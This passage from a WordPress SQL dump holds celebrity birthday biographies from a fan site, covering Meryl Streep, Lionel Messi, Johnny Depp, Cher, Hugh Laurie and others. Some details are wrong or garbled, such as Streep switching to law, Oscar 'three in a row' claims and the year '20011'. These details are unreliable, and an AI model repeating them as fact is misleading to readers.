target=\"_blank\">Yale School of Drama</a>. There she performed in dozens of productions of year which turned out to be a large strain on Meryl as she ended up developing ulcers in her stomach and forced her to switch to law. She finally received her master of fine arts from Yale in 1975 and later received a honorary doctor of arts degree in 1981 from Dartmouth.\r\n<h2>Career Accomplishments</h2>\r\nMeryl has won over one hundred fifty separate awards and has been nominated for over four hundred. She has been nominated for an <a href=\"http://www.vogue.com/11252249/meryl-streep-19-oscar-nominations-grid/\" target=\"_blank\">Oscar</a> nineteen times and finally received her first as best supporting actress in The Deer Hunter. When she won an Oscar for her portrayal of Margaret Thatcher in The Iron Lady she joined the ranks of Walter Brennan and Katherine Hepburn who have all won three Oscars in a row. She is also the most-nominated actor in all of Golden Globe Awards history.\r\n<h2>Most Known For</h2>\r\nMeryl Streep isn’t known for just one project. She is known for his impeccable career as a whole. Even though she has no specific method or style to attribute to her success as a performer she has been able to transform herself into each of her characters, whether they be imaginary or real human beings. The difference is, she is able to portray a character for who they are as opposed to how they appear to be. This is the difference between doing an impression and becoming a real person. She is known for choosing characters audiences have trouble loving and yet, she makes them so relatable, audiences can’t help but love her.\r\n<h2>Current Personal Life</h2>\r\nAfter spending three years with actor John Cazale he lost his fight to lung cancer. Meryl went on to marry Don Gummer, a sculptor six months after Cazale’s death. They now have four children, Henry who is now a musician, Mamie who is now an actress, Grace and Louisa who is now a model. Despite how fantastically famous Meryl is, she has been able to retain a seamless personal life out of the tabloids and away from the rumor mill.\r\n<h2>Where Are They Now</h2>\r\nNow <a href=\"http://www.simplystreep.com/\" target=\"_blank\">Meryl Streep</a>, who is sixty four years old, will be portraying a rock star in Ricki and The Flash. Her character, Ricki, is an aging rocker who has chased her dream at the expense of her family. When her daughter announces that she is getting married, this is Ricki’s last chance to make amends.\r\n\r\n[<a href=\"https://www.flickr.com/photos/nordvb/11253007465/sizes/z/\">Image</a>]\r\n\r\n ','Meryl Streep','','publish','open','open','','meryl-streep','','','2015-10-14 18:03:26','2015-10-14 18:03:26','',0,'http://birthdaypedia.wpengine.com/?p=57',0,'post','',0),(58,2,'2015-06-23 09:15:13','2015-06-23 09:15:13','<h2>In The Beginning</h2>\r\nIn Baton Rouge, Louisiana on June 23, 1956 <a href=\"https://en.wikipedia.org/wiki/Randy_Jackson\" target=\"_blank\">Randall Matthew Jackson</a> was born. He is the son of Julia Jackson, a stay at home mom and Herman Jackson, a foreman at a plant. He began playing bass guitar when he was only thirteen. Since he was the youngest of three children, Randy would have to find his fun elsewhere. He would even sneak out of his parents house so he could go and play the bass guitar at the music clubs in town. Once he was done with high school, he went to Southern University to get a degree in music. He graduated in 1979 where he hit the road running to become a professional musician. He was in Journey for three years and then went on to record with <a href=\"http://www.hollywoodreporter.com/idol-worship/randy-jackson-mariah-careys-manager-520068\" target=\"_blank\">Mariah Carey</a>, Jerry Garcia, Bruce Springsteen and even Madonna. After many years of working he turned to production. He became an executive with Columbia Records and then MCA Records.\r\n<h2>Career Accomplishments</h2>\r\nWhile he was still working as a musician Randy was asked by Keith Richards to play bass guitar for Whoopi Goldberg’s comedy “Jumpin’ Jack Flash.” There he worked with Aretha Franklin and was even in the music video. Afterwards he mostly worked as a sessions artist where he worked for Steve Lukather, Maze and Kenny G. After having recorded for many years, Randy began to expand his reach as a producer and tour manager. He was seen on tour with Mariah Carey where he also played bass. He Produced for Whitney Houston and Dionne Farrs. After <a href=\"http://www.americanidol.com/\" target=\"_blank\">American Idol</a>, Randy released “Randy Jackson’s Music Club, Volume One.” On the album he created two top singles. One was with Paula Abdul titles Dance “Like There’s No Tomorrow” and the other was with Katherine McPhee and Elliot Yamin titled “Real Love.” He also\r\n<h2>Most Known For</h2>\r\nRandy, of course, was one of the first three judges to appear on American Idol back in 2002. While Paula Abdul left the show in 2009 and Simon Cowell left in 2010, Randy hung on to judge with Kara DioGuardi, Jennifer Lopez, Ellen DeGeneres, Nicki Minaj, Steven Tyler, Keith Urban and his old friend Mariah Carey. As the seasons went on, Randy was only ever used as a mentor to the contestants to make way for new judges on the panel.\r\n<h2>Current Personal Life</h2>\r\nRandy was married to Elizabeth Jackson until 1990. Together they had one daughter whom they named Taylor. Five years later he met and married his current wife, Erika Riker. Together they brought into the world their daughter Zoe and later their son Jordan. Recently Randy received <a href=\"http://www.nlm.nih.gov/medlineplus/ency/article/007199.htm\" target=\"_blank\">gastric bypass surgery</a> where a band was fitted around his organ. He ended up losing a hundred fifteen pounds which otherwise would have been very difficult for him as he suffers from type 2 diabetes.\r\n<h2>Where Are They Now</h2>\r\nIn 2013 Randy decided to leave American Idol so he could explore other opportunities including his radio program, Randy Jackson’s Hit List. There he gives listeners the behind the scenes look at Urban AC and Mainstream <a href=\"https://nationalradiohits.com/charts/ac-40/\" target=\"_blank\">AC top 40 hits</a>. He also lets American Idol lovers backstage on Artist Underground.\r\n\r\n[<a href=\"https://www.flickr.com/photos/ynplaycity/2824751239/sizes/o/\" target=\"_blank\">image</a>]\r\n\r\n ','Randy Jackson','','publish','open','open','','randy-jackson','','','2015-10-14 18:22:43','2015-10-14 18:22:43','',0,'http://birthdaypedia.wpengine.com/?p=58',0,'post','',0),(59,2,'2015-06-24 08:26:03','2015-06-24 08:26:03','<h2>In The Beginning</h2>\r\n<a href=\"http://www.dailymail.co.uk/sport/football/article-3143929/Lionel-Messi-Sergio-Aguero-arrive-Concepcion-ahead-Argentina-s-Copa-America-semi-final-clash-against-Paraguay.html\" target=\"_blank\">Lionel Messi</a> was born on the 24th of June in 1987. His parents, Jorge Horacio Messi, a steel worker in a factory and his mother, Celia Maria Cuccittini, a part time cleaner brought him up in Rosario, Santa Fe, Argentina. The youngest of four, Lionel is junior to Rodrigo Messi, Matias Messi, and to his sister Maria Sol Messi. By the time Lionel had turned five he began playing football under the guidance of his father. He went on to join the local youth football team. While on the team he only lost one game in four years. He gained a reputation as “The machine of ‘87.” When Lionel turned eleven years old he was diagnosed with growth hormone deficiency. It would cost nine hundred dollars a month which many sports teams were not willing to pay for. Finally, Carles Rexach arranged for Lionel to try out <a href=\"http://www.fcbarcelona.com/\" target=\"_blank\">FC Barcelona</a>. After his short trial, Lionel was offered a contract which was hastily drawn up on a napkin. On this paper napkin, Lionel was promised full compensation for his medical bills once he moved to Spain. He and his father did and there Lionel attended the Youth Academy.\r\n<h2>Career Accomplishments</h2>\r\nLionel Messi is considered the greatest athlete in football. It is no wonder as he played in the UEFA Champions League through 2015, was in the UEFA Super Cup in 2009 and 20011 and the FIFA Club World Cup those same years. He went on to go the the FIFA World Youth Championship in 2005 and then, just three years later earned the Olympic Gold Medal in 2008. He has won the <a href=\"http://www.topendsports.com/sport/soccer/list-player-of-the-year-world-soccer.htm\" target=\"_blank\">World Soccer Player of the Year</a> in 2009, 2011 and in 2012, then after having won so many times he received the World Soccer Greatest XI of All Time award in 2013. These are just a few examples of his accomplishments but his recognition goes far beyond this.\r\n<h2>Most Known For</h2>\r\nLionel was almost overlooked because of his short stature. Yet he has proven everyone wrong between winning numerous La Liga titles and Champions League titles. He especially well known for his left foot which he favors for most all of his passes, shots and touches. He brought the national team to second place in the 2014 World Cup.\r\n<h2>Current Personal Life</h2>\r\nLionel is the proud father to son Thiago and eagerly awaits the birth of his second child. He currently dating the mother of his child Antonella Roccuzzo. Lionel looks forward to when his son will be able to communicate with him more but Antonella tells him Thiago is at least able to recognize him when he is playing on television. Lionel has spent his extra time promoting the Leo Messi Foundation. His foundation works to give opportunities to children who live disadvantaged and without resources. The UNICEF recognized his contributions and awarded him with the position of goodwill ambassador in 2010. This honor has given Lionel the opportunity to fight for children’s rights all around the world.\r\n<h2>Where Are They Now</h2>\r\nLionel is currently playing for FC Barcelona and the <a href=\"http://national-soccer-teams.pointafter.com/l/8/Argentina\" target=\"_blank\">Argentina National team</a>. He hopes to become an even better player, even though he is widely regarded as the best athlete ever to play the game.\r\n\r\n[<a href=\"https://www.flickr.com/photos/tsevis/15860988660/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Lionel Messi','','publish','open','open','','lionel-messi','','','2015-10-14 18:13:19','2015-10-14 18:13:19','',0,'http://birthdaypedia.wpengine.com/?p=59',0,'post','',0),(60,2,'2015-06-08 10:41:17','2015-06-08 10:41:17','Kanye West is one of the most prolific and well-known artists of the modern generation. With over 20 Grammy awards, his own record label and designing credits, West has been a very present personality over the last 15 years in American culture.\r\n<h2>In the beginning</h2>\r\n<a href=\"http://www.notablebiographies.com/news/Sh-Z/West-Kanye.html\" target=\"_blank\">Kanye West</a> was born on June 8, 1977 to Ray and Donda West in Atlanta, Georgia. His parents divorced when he was three years old, and he moved with his mother to the south side of Chicago where he was raised in a middle class environment with summer visitations to his dad. His mother was a professor of English, and his dad was a well-known photographer who later became a church counselor. He also spent a brief amount of time in China as a child when his mother was teaching there. Dr. Donda West encouraged her son’s creativity and supported him as an artist even paying for limited studio time when he was a youngster to try out his craft. While she was disappointed he didn’t finish college, she acknowledged that not every career path requires a college degree. This was hard for her when she was raised in a time when college and education was the only way to achieve your goals as an adult. West dropped out of college during his first year to pursue his artistry. In the beginning of his career he was foremost a producer for other rap and hip-hop artists such as Jay-Z. He also wrote and produced for Ludacris and Alicia Keys.\r\n<h2>Most known for</h2>\r\nKanye West is most known for his meteoric rise to fame as a <a href=\"http://www.hotnewhiphop.com/artists/\" target=\"_blank\">rap and hip-hop musician</a>. He has been awarded over 20 Grammy awards including Best Rap Album in 2004 for his first effort, College Dropout. Late Registration in 2005 and Graduation in 2007 kept the accolades rolling in. Kanye West has also had forays into entrepreneurship with efforts at running restaurants in the Chicago area and off and on in the fashion industry where his latest efforts have met with positive criticism. He designs a line of women’s clothing as well as shoes for several outlets. West is also known for critical outbursts while in the public eye such as criticism for <a href=\"http://www.xxlmag.com/news/hip-hop-today/2013/09/today-hip-hop-kanye-west-criticizes-president-bush-hurricane-katrina-benefit-concert/\" target=\"_blank\">George Bush</a> during the time of Hurricane Katrina and at various award shows where he has had verbal outbursts. He also participated in a very vocal, public feud with Jimmy Kimmel over a sketch Kimmel did on Jimmy Kimmel, Live!\r\n<h2>Current Personal Life</h2>\r\nIn his current personal life, Kanye West is married to reality star, <a href=\"http://www.celebuzz.com/photos/inside-kim-kardashian-and-kanye-wests-20-million-mansion/kim-kardashian-kanye-west-20-million-mansion-2/\" target=\"_blank\">Kim Kardashian</a> and together they have one daughter, North who was born in June of 2013. The Wests were married on May 24, 2014 and are currently expecting their second child, a son, in December of 2015. West currently is involved in charity efforts to combat poverty and hunger as well as efforts to improve drop-out rates in high school by encouraging young people to stay in school.\r\n\r\nWith over 21 million albums sold and over 100 million digital downloads, Kanye West and his musical career are here to stay and will undoubtedly continue to grow.\r\n\r\nImage credit: istockphoto.com\r\n\r\n ','Kanye West','','publish','open','open','','kanye-west','','','2015-10-14 17:27:49','2015-10-14 17:27:49','',0,'http://birthdaypedia.wpengine.com/?p=60',0,'post','',0),(61,2,'2015-05-19 10:57:47','2015-05-19 10:57:47','<a href=\"https://en.wikipedia.org/wiki/Andrea_Pirlo\">Andrea Pirlo</a> is a professional soccer player (footballer) who plays for both the Italian national team and for the Turin based Juventus Football Club S.p.A.\r\n<h2>In the Beginning</h2>\r\nAndrea Pirlo was born in Flero, Italy on May 19, 1979 (which makes him a Taurus). The Flero youth side is where Pirlo began his career. After moving to Voluntas, he began to play for Brescia in 1994, the local club. There, he was the youngest player to make an appearance in Serie A. Soon, he was playing for Internazionale, although it took a few years for him to break through to the first team. It was here Carlo Mazzone made the decision to convert Pirlo from an offensive midfielder to a deep-lying playmaker. In 2001 Pirlo was sold to Milan.\r\n<h2>Career Accomplishments</h2>\r\nOnce Andrea Pirlo started playing for Milan in 2001, he started to become a world class footballer and one of the best deep-lying playmakers and set-piece specialists internationally He led Milan to UEFA Super Cup, Serie A, and Champions League titles. He helped the Italian team take home a bronze medal at the 2004 Summer Olympics. He won back-to-back league titles and Italian Super Cups with Juventus. In 2012 he earned Team of the Tournament honors during the 2012 European Championship.\r\n<h2>Most Known For</h2>\r\nAndrea Pirlo is most known for being one of football’s/soccer’s best midfielders, internationally. He is considered a free-kick specialist, who is usually utilized as a deep-lying playmaker in midfield. He is highly regarded in his position throughout the entire international football/soccer community for his ball control, passing ability, and vision. Pirlo was an integral part of the Italian team for the <a href=\"http://www.fifa.com/worldcup/archive/germany2006/\" target=\"_blank\">2006 FIFA World Cup</a>. Many say he led them to victory when his team triumphed over France to win the World Cup. During the entire series of World Cup games, Pirlo won Man of the Match three times!\r\n<h2>Current Personal Life</h2>\r\nAndrea Pirlo married Deborah Roversi in 2001. They had two children together, son Niccolo and daughter Angela. Pirlo wrote an autobiography in 2013-2014 called <em>Penso Quindi Gioco (I Think, Therefore I Play).</em> Also in 2014, Roversi and Pirlo divorced. Once the divorce was final, there was quite the scandal when it was reported that Pirlo had been having an affair with Valentina Baldini, a real estate agent and former partner of one of the <a href=\"http://www.juventus.com/juve/en/home\" target=\"_blank\">Juventus</a> owners’ sons (Richard Crande Stevens).\r\n\r\nAside from his marriage woes, Pirlo seems to be doing well for himself. His father founded a metal trading company in 1982 called Elg Steel that is doing pretty well for itself. Pirlo has a stake in this family business. He has a great passion for wine and even owns his own vineyard in this hills above Brescia called Pratum Coller Vineyard (which means meadow hill in Latin). He plans to work more with wine after retirement.\r\n<h2>Where Are They Now</h2>\r\nDuring the 2014 FIFA World Cup qualification campaign, Pirlo scored one goal which made them top their group, undefeated. However , they ultimately ended up in 22<sup>nd</sup> place. Pirlo announced his international <a href=\"http://prosoccertalk.nbcsports.com/2015/02/16/andrea-pirlo-rules-out-retirement-this-summer-everyone-rejoices/\" target=\"_blank\">retirement</a> after the 2014 World Cup. However, he shortly changed his mind and is currently playing for Juventus.\r\n\r\n[<a href=\"https://www.flickr.com/photos/nazionalecalcio/15155625416/sizes/o/\" target=\"_blank\">Image</a>]\r\n\r\n ','Andrea Pirlo','','publish','open','open','','andrea-pirlo','','','2015-10-14 16:22:08','2015-10-14 16:22:08','',0,'http://birthdaypedia.wpengine.com/?p=61',0,'post','',0),(62,2,'2015-06-09 10:10:08','2015-06-09 10:10:08','<a href=\"http://www.imdb.com/name/nm0000136/\" target=\"_blank\">Johnny Depp</a> is an acclaimed American Actor who has won both a Golden Globe and a Screen Actor’s Guild award. Depp chooses roles that are often off-beat and dark characters that draw one into his world of insight and intrigue.\r\n<h2>In the Beginning</h2>\r\nJohn Christopher Depp, II was born in Kentucky on June 9, 1963 to a civil engineer father his waitress wife, Betty Sue. Depp’s family moved several times due to his father’s job before coming to rest in Miramar, Florida when Johnny was seven. Johnny Depp has revealed in interviews that the pre-teen and teenage years were difficult for him as he experimented with drugs, alcohol and even self-harming to handle puberty and the growing tensions at home. His parents divorced when Johnny was 15, causing a rift between Depp and his father. Just a year later, he dropped out of high school in order to pursue music. He eventually met and married Lori Allison at the age of 20 and in 1983, they and his band, The Kids moved to Los Angeles to seek success. While somewhat successful, the band could not make ends meet and eventually broke up. A meeting with actor Nicholas Cage introduced Johnny to the idea of acting. In the beginning of his career, he even worked as a <a href=\"http://www.philstar.com/cebu-entertainment/2014/04/03/1308314/johnny-depps-first-job-telemarketer\" target=\"_blank\">telemarketer</a> selling pens to pay the bills.\r\n<h2>Most Known For</h2>\r\nJohnny Depp is most known for his creativity and unusually dark roles. From Sweeny Todd to Jack Sparrow to Edward Scissorhands, Depp has shown time and time again the depth and commitment to acting that has garnered him many award nominations, a Golden Globe and a Screen Actor’s Guild Award. Depp got his acting start in 1984 with a small role in <em>The Nightmare on Elm Street</em> followed shortly by a role in <em>Platoon</em>. Even though his first marriage fell apart in 1985, Johnny’s acting career was taking off. In 1987, he landed a role in the television series <em><a href=\"http://www.rottentomatoes.com/m/21-jump-street-2011/\" target=\"_blank\">21 Jump Street</a></em>.\r\n\r\nThis role catapulted him to stardom and teen idol status. By most reports, Depp did not enjoy being a teen idol. After his three year contract was up, Johnny Depp moved on to starring exclusively in movie roles. He teamed up with Tim Burton for <em>Edward Scissorhands</em> in 1990 and has gone on to collaborate with Burton several times over. He also starred in <em>Cry Baby</em> in 1990, which was not a huge success at the time but has gained a cult following and a love for Johnny Depp since.\r\n<h2>Current Personal Life</h2>\r\nIn Johnny Depp’s current personal life he is married to <a href=\"http://www.usmagazine.com/celebrity-news/news/amber-heard-dont-define-me-by-my-bisexuality-2015306\" target=\"_blank\">Amber Heard</a>. They met in 2012 right about the time that Depp was separating from his then long-time girlfriend, Vanessa Paradis. Depp and Heard became engaged on Christmas Eve in 2013 and were wed in February of 2015. Depp has two children with his ex, Paradis: Lily Rose (1999) and Jack (2002).\r\n<h2>Where are they now?</h2>\r\nWhere are they now? Currently Johnny Depp is living in the United States after several years of living in France with Paradis. Most recently, Depp has been in the news due to a controversy that resulted when Depp and his wife, Amber, took their two dogs into Australia without permission. The dogs were actually ordered out of the country and Depp is at risk of formal charges being filed.\r\n\r\n[<a href=\"https://www.flickr.com/photos/modenadude/3656803264/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Johnny Depp','','publish','open','open','','johnny-depp','','','2015-10-14 17:33:23','2015-10-14 17:33:23','',0,'http://birthdaypedia.wpengine.com/?p=62',0,'post','',0),(63,2,'2015-05-20 09:26:07','2015-05-20 09:26:07','Cher is an American singer, Goddess of Pop, Oscar winning actress, entertainer, and outrageous fashion icon. She has a career that spans decades due to her creative and continuous reinvention of herself.\r\n<h2>In the Beginning</h2>\r\nCher was born <a href=\"https://en.wikipedia.org/wiki/Cher\" target=\"_blank\">Cheryl Sarkisain</a> on May 20, 1946 in El Centro, California. At 16 she dropped out of school and moved to Los Angeles. Cher met Sonny Bono in LA in 1962. They began their duo in1964 as Caesar & Cleo, but they didn’t do well. In 1965 they changed Caesar and Cleo to Sonny & Cher, recorded “I Got You Babe” and traveled to England for their big break. They were overnight sensations. Soon they had 5 hits in the top 100 Billboard chart and <em>The <a href=\"http://sonnycher.blogspot.com.ar/p/trivia.html\" target=\"_blank\">Sonny and Cher</a> Comedy Hour</em>. They divorced in 1975 and Cher went solo with hit songs “Gypsies, Tramps, and Thieves” and “Half-Breed”.\r\n<h2>Career Accomplishments</h2>\r\nThe greatest career accomplishment any performer can have is longevity. Cher’s career can only be described in decades. She has had 15 number one hits and 33 top ten hits according to the Billboard Charts. She is the only artist to have a number-one single on the charts each decade for the last six decades. She has been in over 10 critically acclaimed movies. She has been nominated for 91 awards and has received 51 of them. She has influenced the world of fashion since the 60s, pushing the social boundaries on bare-skin, tattoos, plastic surgery, and more. Twice, Cher has headlined a hit show in Las Vegas for an extended period of time.\r\n<h2>Most Known For</h2>\r\nCher is known for her epic career. From the late sixties through today, Cher has an amazing body of work that is hard to cherry pick from. She began as a trend-setting singer of folk-pop songs (“I Got You Babe”, “Gypsies Tramps and Thieves”). In the <a href=\"http://www.allmusic.com/album/100-hits-70s-pop-mw0000814323\" target=\"_blank\">70s</a> she went solo and sang disco in the hit album and single “Take Me Home.” Throughout the <a href=\"http://popmusic.makesnoise.com/80s-pop-songs.html\" target=\"_blank\">80s</a> Cher broke into Hollywood. Eventually she won Golden Globes and an Oscar for her strong acting performances. Always pushing boundaries, the music video for “If I Could Turn Back Time,” was banned from MTV for being too racy. Cher continued her successes through the 90s with “The Shoop Shoop Song (It’s In His Kiss),” and pioneering the auto-tune age with her hit song “Believe”. In the 2000s Cher gave us “Song for the Lonely”. Cher is known for her music, her movies, her fashion, and her gumption.\r\n<h2>Current Personal Life</h2>\r\nCher and Sonny had a daughter, who has recently transitioned from female to male. He goes by Chaz Bono. She had another son, Elijah Allman, with her second ex-husband, Gregg Allman. While Cher has dated plenty, she has not married for a third time. She is currently living in Malibu, California.\r\n<h2>Where Are They Now</h2>\r\nIn December 2014, Cher had to cancel the remaining Dressed To Kill tour dates due to an illness. However, it was announced in the spring of 2015 that Cher is going to be the face of Marc Jacobs’ Fall/Winter advertising campaign for 2015-2016. Furthermore, it’s been announced she’s been cast in the movie <a href=\"http://www.imdb.com/title/tt1188698/\" target=\"_blank\">Gardel</a> (2017).\r\n\r\n[<a href=\"https://www.flickr.com/photos/david_carroll/14013335566/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Cher','','publish','open','open','','cher','','','2015-10-14 16:22:29','2015-10-14 16:22:29','',0,'http://birthdaypedia.wpengine.com/?p=63',0,'post','',0),(64,2,'2015-06-10 08:38:40','2015-06-10 08:38:40','Kate Upton is a very popular and vibrant American model and actress. She has achieved fame and recognition over the last seven years as one of the top models in the world as well as being named <em><a href=\"http://www.people.com/article/lea-michele-kate-upton-the-layover-movie-william-h-macy\" target=\"_blank\">People</a> </em>Magazine’s sexiest woman in 2014.\r\n<h2>In the beginning</h2>\r\nKatherine Elizabeth Upton was born on June 10, 1992 in St. Joseph, Michigan. She is the daughter of Shelly Davis, a former Texas state tennis champion, and Jeff Upton, a high school athletics director. Her uncle is Fred Upton, a republican congressman from Michigan. Her great grandfather, Frederick Upton, was one of the original founders of Whirlpool Corporation. Her family moved to Melbourne, Florida when Kate was young and she was raised and attended school there. As a youngster, Kate was passionate about horses and competed for the American Paint Horse Association.\r\n\r\nShe won several national and world titles competing with her horses, Roanie Pony and Zipped. In the beginning of her modeling career, Kate attended a casting call in Miami, Florida and was signed the very same day to Elite Model Management. She was 16 years old at the time. She then moved to New York City and later signed with IMG Models in 2010. At the age of 18, she was just about to take off as a major player in the modeling industry.\r\n<h2>Most Known For</h2>\r\n<a href=\"http://www.grubstreet.com/2015/06/jennifer-lawrence-nobu.html\" target=\"_blank\">Kate Upton</a> is most known for her <em>Sports Illustrated Swimsuit Edition</em> layouts. She was first featured in the magazine in 2011 and then was the cover model in both 2012 and 2013. A big break for any model, this was just the tipping point for Upton. She was also the face of Guess Jeans in 2010 and 2011 as well as modeling for Dooney & Bourke as well as many other top companies. She also modeled for Beach Bunny Swimwear and even designed a swimwear collection for them.\r\n\r\nShe was on the cover of <em>GQ </em>in July of 2012 and <em>Vogue</em> in June of 2013. With over ten international covers, Kate Upton is one of the top models in the world. She was even named Model of the Year at the 10<sup>th</sup> Annual Style Awards in 2013. Kate has also had an aspiring acting career. She has been cast in three major motion pictures, including <em>The Other Woman</em> in 2014, with an additional film currently in production. She has also appeared on numerous talk shows including <em>Jimmy Kimmel, Live!</em> and <em>Ellen</em> as well as guest hosting on <em>Live! With Kelley and Michael. </em>\r\n<h2>Current Personal Life</h2>\r\nKate Upton’s current personal life is somewhat of a mystery. She generally plays her personal life close to the vest. She has been linked to both Maksim Chmerkovsky of <em><a href=\"http://abc.go.com/shows/dancing-with-the-stars\" target=\"_blank\">Dancing with the Stars</a> </em>and Justin Verlander of the Detroit Tigers. They have been confirmed as boyfriends during the last several years. Currently, she is single but has been rumored to be dating several famous faces, though none have been confirmed. When asked publically to comment on her personal life, Upton generally responds that she is focused on her career and not dating.\r\n<h2>Where are they now?</h2>\r\nKate Upton is currently working in the modeling industry and working on the <a href=\"http://www.aceshowbiz.com/celebrity/kate_upton/filmography.html\" target=\"_blank\">film</a>, The Layover. She remains a top model and is consistently ranked as a top searched name on Google.\r\n\r\n[<a href=\"https://www.flickr.com/photos/50668519@N00/14099507113/sizes/c/\" target=\"_blank\">Image</a>]\r\n\r\n ','Kate Upton','','publish','open','open','','kate-upton','','','2015-10-14 17:33:40','2015-10-14 17:33:40','',0,'http://birthdaypedia.wpengine.com/?p=64',0,'post','',0),(65,2,'2015-05-21 10:50:09','2015-05-21 10:50:09','<a href=\"http://mentalfloss.com/article/64217/10-things-you-might-not-know-about-mr-t\" target=\"_blank\">Mr. T</a> is an American actor, professional wrestler, motivational speaker, and all around tough-guy with an easily recognizable and very memorable brand.\r\n<h2>In the Beginning</h2>\r\nMr. T was born Laurence Tureaud on May 21, 1952, in Chicago, Illinois. He was the youngest of 12 children. After a career in the Army, he became a bouncer and a bodyguard, which is where he cultivated his image. He won two tough-man competitions on that aired on NBC. The first was “Sunday Games” for “America’s Toughest Bouncer”. The second was, “Games People Play.” Sylvester Stallone saw Mr. T win the latter competition and offered him the role in <em>Rocky III</em> that propelled him to stardom.\r\n<h2>Career Accomplishments</h2>\r\nAfter his breakout performance in <em><a href=\"http://www.imdb.com/title/tt0084602/\" target=\"_blank\">Rocky III</a></em>, his career took off. He did several guest roles on television before getting his role <em>The A-Team.</em> He continued to make television appearances. In 1983 he co-starred in <em>DC Cab</em> with Adam Baldwin, Gary Busey, Max Gail, Paul Rodriguez, and others. In 1984 he made the motivational video <em>Be Somebody . . Or Be Somebody’s Fool! </em>In 1988 Mr. T starred in his own television series <em>T. and T</em>. He had his own reality show, “I Pity the Fool,” he was featured in several commercials, he has sold products via television infomercial, had a successful wrestling career, made a foray into the music business, and has a reputation as a solid motivational speaker.\r\n<h2>Most Known For</h2>\r\nWhat Mr. T is known for can be broken down into two categories. Part one, his look. He is easily recognizable by gold jewelry, his trademark <a href=\"http://www.manataka.org/page2651.html\" target=\"_blank\">African Mandinka warrior hairstyle</a>, and his tough-guy image. Secondly, he is best known for his acting roles and professional wrestling career. His B. A. Baracus from the 1980s television series <em>The A-Team </em>won him an People’s Choice Award in 1984. Many people still quote his character Clubber Lang in <em>Rocky III</em> saying, “I pity the fool…”. Plus, Mr. T has quite the fan following from when he won the World Wrestling Federation’s (WWF) first <em>WrestleMania</em>.\r\n<h2>Current Personal Life</h2>\r\nIn the early 90s Mr. T was diagnosed with T-cell lymphoma, a form of cancer. He kept his public appearances to a minimum at this time, choosing to appear only in commercials. As he began to get better, he began to do movie and television appearances including Inspector Gadget and Not Another Teen Movie. Soon, Mr. T’s cancer went into remission.\r\n\r\nIn 2014, a proposed illegitimate son came public, wanting to sue Mr. T. The case was dropped because the filing and administrative fees were not paid.\r\n\r\nMr. T has three children with Phillys Clark. He is a born-again Christian. He spends his time between residences in Albuquerque, New Mexico, and Chicago, Illinois.\r\n<h2>Where Are They Now</h2>\r\nIn 2014 Mr. T was inducted to the WWE Hall of Fame. He is currently working on a home renovation series called <em><a href=\"http://www.hollywoodreporter.com/live-feed/mr-t-lands-home-improvement-782994\" target=\"_blank\">I Pity the Tool</a></em> which will air sometime in 2015. He will host the DIY Network straight-to-series show with <em>HGTV Design Star</em> winner Tiffany Brooks. The premise of the series revolves around destroying outdated spaces and remodeling them for a family home makeover.\r\n\r\n[<a href=\"https://www.flickr.com/photos/randar/14795720096/sizes/c/\" target=\"_blank\">Image</a>]\r\n\r\n ','Mr. T','','publish','open','open','','mr-t','','','2015-10-14 16:22:58','2015-10-14 16:22:58','',0,'http://birthdaypedia.wpengine.com/?p=65',0,'post','',0),(66,2,'2015-06-11 09:08:30','2015-06-11 09:08:30','<a href=\"http://www.theguardian.com/tv-and-radio/hugh-laurie\" target=\"_blank\">Hugh Laurie</a> is an acclaimed British comedian, actor, musician, director and author who rose to fame in the United States with his role as the cranky, irascible Dr. Gregory House on the television drama <em>House</em>. Previously, he had spent most of his acting career doing mostly comedy and children’s movies.\r\n<h2>In the Beginning</h2>\r\nJames Hugh Calum Laurie was born in Oxford, England on June 11, 1959 to Ran Laurie, a medical doctor, and Patricia Laurie, a writer who was occasionally published in The London Times. Hugh’s father was also an Olympic gold medalist, winning a gold medal in the 1948 games in rowing. The youngest of four children with two older sisters and one brother, Hugh was brought up in the <a href=\"https://en.wikipedia.org/wiki/Church_of_Scotland\" target=\"_blank\">Scottish Presbyterian Church</a> but says faith and God was not a huge factor in his family life. Laurie is a proclaimed atheist that says the ramifications of pleasure and the earning or deserving of pleasure along with the strong expectations of his mother caused him to not really identify with his mother to a great degree. He even reports that he felt like his mother didn’t particularly like him very much.\r\n\r\nConversely, he enjoyed a very close relationship with his father who he says is one of the sweetest people he has ever met. Hugh Laurie attended some of the best schools in England including Eaton and Selwyn College at Cambridge, but he was not a very enthusiastic student, focusing mostly on athletics. He was a rower just like his father and won several important competitions before the acting bug got him during a bout with Mono his freshman year of college. He couldn’t row, so he joined the dramatic club at Cambridge called the Footlights.\r\n\r\nIt was at Footlights that he became involved with Emma Thompson, a British actress, and Stephen Fry, who would go on to be Laurie’s comedic partner for much of his career. In the beginning of his career Laurie, Thompson and Frye submitted The Cellar Tapes to the Edinburgh Fringe Festival and won the Perrier Comedy Award.\r\n<h2>Most Known For</h2>\r\nWhile Hugh Laurie is most known for playing <a href=\"http://es.house.wikia.com/wiki/Gregory_House\" target=\"_blank\">Dr. Gregory House</a> to most Americans, he enjoyed a very robust career in television and film prior to taking on the role in <em>House</em> in 2004. With his creative partner, Stephen Fry, he was involved in several British comedy shows including <em>A Bit with Fry and Laurie</em> which ran for eight years and <em>Jeeves and Wooster</em> where he played a rich, but inept character that was always requiring the assistant of his butler, Jeeves, to get out of trouble. Both of these programs, among many others, catapulted Laurie to fame in the United Kingdom well before Americans go a good glimpse of him as Jasper, one of the inept villains, in the live action version of <em><a href=\"https://theywereinthat.wordpress.com/2009/04/12/hugh-laurie-from-house-to-101-dalmatians/\" target=\"_blank\">101 Dalmatians</a></em> in 1996.\r\n<h2>Current Personal Life</h2>\r\nIn his current personal life Hugh Laurie has been married to theater producer Jo Green since 1989. They have three children, and the family currently lives in London after living in Los Angeles for a time during the filming of <em>House</em>.\r\n<h2>Where are They Now?</h2>\r\nWhere are they now? Hugh Laurie has been working on an album release for <em>Didn’t it Rain?,</em> and most recently starred in the Disney movie, Tomorrowland with George Clooney and Tim McGraw.\r\n\r\n[<a href=\"https://www.flickr.com/photos/buou/2918417759/sizes/z/\" target=\"_blank\">Image</a>]\r\n\r\n ','Hugh Laurie','','publish','open','open','','hugh-laurie','','','2015-10-14 17:33:56','2015-10-14 17:33:56','',0,'http://birthdaypedia.wpengine.com/?p=66',0,'post','',0),(67,2,'2015-05-22 10:15:05','2015-05-22 10:15:05','Santana Garrett is a <a href=\"http://www.lethalwow.com/wrestler/\" target=\"_blank\">female professional 